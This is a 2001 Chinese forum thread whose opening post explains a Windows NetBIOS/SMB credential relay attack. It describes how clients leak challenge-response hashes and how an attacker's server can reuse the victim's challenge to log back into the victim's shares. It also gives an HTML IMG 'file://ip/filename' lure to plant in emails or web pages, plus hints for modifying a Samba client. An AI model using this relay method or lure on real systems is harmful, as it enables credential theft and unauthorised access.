嘉定都市网

查看:2418 回复:1 发表于 2001-12-23 00:45

该用户从未签到

qrcode
跳转到指定楼层
楼主
发表于 2001-6-16 09:29:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

黑客案例--微软系统泄露密码入侵分析 [复制链接]

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
1。客户端<--------------------建立TCP连接----------------->服务端

  2。客户端-------客户端类型、支持的服务方式列表等---------->服务端

  3。客户端<---------服务器认证方式、加密用的key等-----------服务端
认证方式就是用户级认证还是共享级认证和密码加密不,key是服务器随机生成的
8个字节,WIN2000已经支持16个字节的 key。

  4。客户端--------------用户名、加密后密码----------------->服务端
WIN9X、WINNT、WIN2000这有个漏洞,不经过提示等就把当前用户名,密码加密后
发过去了,导致密码泄漏。这儿加密是DES的变形,lockedpass=chgdes(key,
pass)。这儿的pass是作为DES变形的KEY,key是作为DES变形的待加密数据。
5。客户端<---------------认证成功否-----------------------服务端
  WINDOWS客户端第4步有漏洞,显然服务端可以得到username和
lockedpass=chgdes(key,pass), 其中key可以自由指定,因为这是服务方提供的,
usname、pass是客户端当前访问者用户名和密码。这儿的加密变换不可逆,但已经
可以用暴力法破解了,也已经有了这样的程序。其实我们有时并不一定要得到密码
明文的,只要能提供连接需要的就可以了。我们来看得到lockedpass有什么用,我
们反过去访问看看,telnet、ftp等连接要密码明文我们得到的lockedpass不能提
供,那么我们考虑用同样加密算法传密码密文的服务呢?比如就是NETBIOS共享服
务。前面是服务端得到东西,那现在就是站在客户端了,再看前面那过程,显然其
实我们并不需要提供pass,是不是只需要提供username和
lockedpass2=chgdes(key2,pass)就可以了?其中key2是现在的服务端提供的。看
看我们有 usname和lockedpass=chgdes(key,pass)其中key我们可以自己指定,大
家一看显然只要key=key2那么就需要的我们都有了是不是?所以我们要使得
key=key2.

好我们再仔细看看连接过程,别人连接两步1、2:

  1。客户端<--------------------建立TCP连接----------------->服务端

  2。客户端-------客户端类型、支持的服务方式列表等---------->服务端
下面就该
3。客户端<---------服务器认证方式、加密用的key等-----------服务端
这我们需要提供key,这儿我们不能随便提供key,需要提供key2,那么我们就要得到
key2,显然需要连接NETBIOS服务回去。显然这而需要连接回去的11,22,33共3步
(为了区分连接回去的步子用重号表示)才能得到key2,显然这2步和3步不需要有
先后顺序。所以我们可以得到连接指定IP的NETBIOS服务然后等这用户来访问,这
可能有时间超时等处理,或者等到任意IP连接NETBIOS服务后马上连回去,反正怎
么处理方便、满足需要就怎么处理。

下面显然就是设置 key=key2返回3,那就等4得到lockedpass了,第5步嘛就你自由
处理了,要不返回密码错误,后面就是44、55。。。。
 
总的来就是1,2,11,22,33,3,4,5,44,55。。。。。显然你就是以那机器
访问你的用户的身份去访问他的NETBIOS服务了,能干什么那就看那用户的权限了

 
注意有兴趣的可以把SAMB包的客户端程序修改加上一点服务的前几步就可以了。显
然这主要利用的还是WINDOWS泄露当前用户名、加密密码漏洞。还有这需要别人来
访问你的机器,这好办,邮件或者主页等里面来个 “<“IMGsrc”="file:
//ip/filename" ...”就可以了
我实验了去掉机器139口服务(要不有139口要影响后面端口重定向),用端口重定
向程序把来向139口定向回去,找另一个WINNT机器用\\ip访问那重定向139口的机
机器已经用WINNT机器的当前用户访问WINNT了,只是由于没有客户端的处理界面不
能操作
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享淘帖 支持支持 反对反对
回复

使用道具 打印 举报

  • TA的每日心情
    奋斗
    2014-7-17 16:20
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    沙发
    发表于 2001-12-23 00:45:23 | 只看该作者
    高手啊,高手~~
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    发表新贴 返回顶部